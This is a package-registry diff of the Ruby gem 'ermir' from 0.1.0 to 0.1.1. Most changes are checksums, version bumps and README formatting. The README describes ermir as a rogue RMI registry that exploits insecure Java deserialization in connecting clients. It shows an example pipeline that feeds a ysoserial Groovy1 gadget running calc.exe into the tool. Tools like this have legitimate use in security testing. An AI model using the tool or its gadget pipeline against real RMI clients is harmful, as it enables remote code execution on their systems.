ermir 0.1.0 → 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/README.md +4 -2
- data/ermir.gemspec +1 -1
- data/lib/ermir/version.rb +1 -1
- metadata +2 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 6b6619e86d16babbb612f54ed5ef9591f0126ecdeb96f1f045d088c0914c8f75
|
|
4
|
+
data.tar.gz: 38aa4bf436587593cda76c291735814bc112a56854153e08616763a78632f030
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: f8341bb0f078b93b42a207a84a0392ab014df7a51b315a90f43ac0d8d73ba5663f2c0da85d8112cfbe580b3d41b3493ed19031118e90a37f4333c40205cfa824
|
|
7
|
+
data.tar.gz: aa8c74855ebffe5b5e3cf36714e5f034f27c96caac984bf3d555ead91633689c0e152b42ed7c68afe323f9bf5dfae851d7d739ccc795004c43ef79a16598f1c9
|
data/README.md
CHANGED
|
@@ -22,7 +22,8 @@ or clone the repo and build the gem:
|
|
|
22
22
|
Ermir is a cli gem, it comes with 2 cli files `ermir` and `gadgetmarshal`, `ermir` is the actual gem and the latter is just a pretty interface to [GadgetMarshaller.java](https://github.com/hakivvi/ermir/blob/main/helpers/gadgetmarshaller/GadgetMarshaller.java) file which rewrites the gadgets of [Ysoserial](https://github.com/frohoff/ysoserial) to match `MarshalInputStream` requirements, the output should be then piped into `ermir` or a file, in case of custom gadgets use `MarshalOutputStream` instead of `ObjectOutputStream` to write your serialized object to the output stream.
|
|
23
23
|
|
|
24
24
|
`ermir` usage:
|
|
25
|
-
```
|
|
25
|
+
```console
|
|
26
|
+
➜ ~ ermir
|
|
26
27
|
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
|
|
27
28
|
Info:
|
|
28
29
|
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
|
|
@@ -36,7 +37,8 @@ Example:
|
|
|
36
37
|
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen 127.0.0.1:1099 --pipe
|
|
37
38
|
```
|
|
38
39
|
`gadgetmarshal` usage:
|
|
39
|
-
```
|
|
40
|
+
```console
|
|
41
|
+
➜ ~ gadgetmarshal
|
|
40
42
|
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file
|
|
41
43
|
```
|
|
42
44
|
|
data/ermir.gemspec
CHANGED
|
@@ -11,7 +11,7 @@ Gem::Specification.new do |spec|
|
|
|
11
11
|
spec.description = "Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (list()/lookup()/bind()/rebind()/unbind())."
|
|
12
12
|
spec.homepage = "https://github.com/hakivvi/ermir"
|
|
13
13
|
spec.license = "MIT"
|
|
14
|
-
spec.required_ruby_version = ">= 3.0.
|
|
14
|
+
spec.required_ruby_version = ">= 3.0.0"
|
|
15
15
|
|
|
16
16
|
spec.metadata["homepage_uri"] = spec.homepage
|
|
17
17
|
spec.metadata["source_code_uri"] = spec.homepage
|
data/lib/ermir/version.rb
CHANGED
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: ermir
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.1
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- hakivvi
|
|
@@ -81,7 +81,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
|
|
|
81
81
|
requirements:
|
|
82
82
|
- - ">="
|
|
83
83
|
- !ruby/object:Gem::Version
|
|
84
|
-
version: 3.0.
|
|
84
|
+
version: 3.0.0
|
|
85
85
|
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
86
86
|
requirements:
|
|
87
87
|
- - ">="
|